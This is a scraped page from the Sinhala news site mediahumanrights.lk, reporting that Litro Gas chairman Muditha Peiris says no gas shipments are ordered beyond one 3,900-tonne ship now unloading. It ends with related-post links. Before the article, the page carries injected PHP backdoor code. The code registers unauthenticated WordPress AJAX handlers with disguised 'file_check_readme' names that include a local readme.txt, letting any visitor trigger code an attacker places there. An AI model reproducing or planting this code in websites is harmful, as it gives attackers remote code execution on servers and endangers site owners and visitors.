if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } දැන් බාන ගෑස් නැව විතරයි.. තව එකම නැවක්වත් ඇණැවුම් කරවත් නෑ.. හිස් මුහුද පමණයි..- ලිත්‍රො සභාපති - mediahumanrights.lk
mediahumanrights.lk
Local News News

දැන් බාන ගෑස් නැව විතරයි.. තව එකම නැවක්වත් ඇණැවුම් කරවත් නෑ.. හිස් මුහුද පමණයි..- ලිත්‍රො සභාපති

දැනට ගොඩබාමින් තිබෙන ගෑස් මෙට්‍රික්ටොන් 3900 නෞකාවට අමතරව කිසිම ගෑස් නෞකාවක් ඇනවුම් කර නැතැයි ලිට්‍රෝ ගෑස් සමාගමේ නව සභාපති මුදිත පීරිස් මහතා පවසයි.

සමාගමේ හිටපු පාලකයන් වගකීම් විරහිතව කටයුතු කර ඇති බවත් ගොඩබාන විට මුදල් ගෙවීමේ පදනම මත සැපයුම්කරුවන් කීපදෙනෙක් සමඟ සාකච්ඡා කර හෝ නැතැයිද ඔහු පැවසීය.

එනිසා දැන් ඉතිරිව ඇත්තේ හිස් මුහුද පමණක් යයිද ඔහු සදහන් කලේය.

දැනට ගොඩබාමින් ඇති සුළු ගෑස් ප්‍රමාණෙයන් මෙරට විශාල ගෑස් අර්බුදය විසදිය නොහැකි බව කණගාටුවෙන් කිව යුතුව ඇති බවත් ඔහු කීය.

Related posts

ලංකාවේ උද්ධමනය 128%යි.. වෙනිසියුලාව, ලෙබනන පසු කරයි.. දෙවැනි සිම්බාවේට පමණයි..- හැන්කේ වාර්තාව මෙන්න…

Shiran Viraj

ප්‍රදේශ කිහිපයකට සවස 4 වෙනකම් වතුර නෑ

Shiran Viraj

පෝට් සිටියේ ‘ක‍්‍රිප්ටො කරන්සි’ භාවිතය අරඹයි…

Shiran Viraj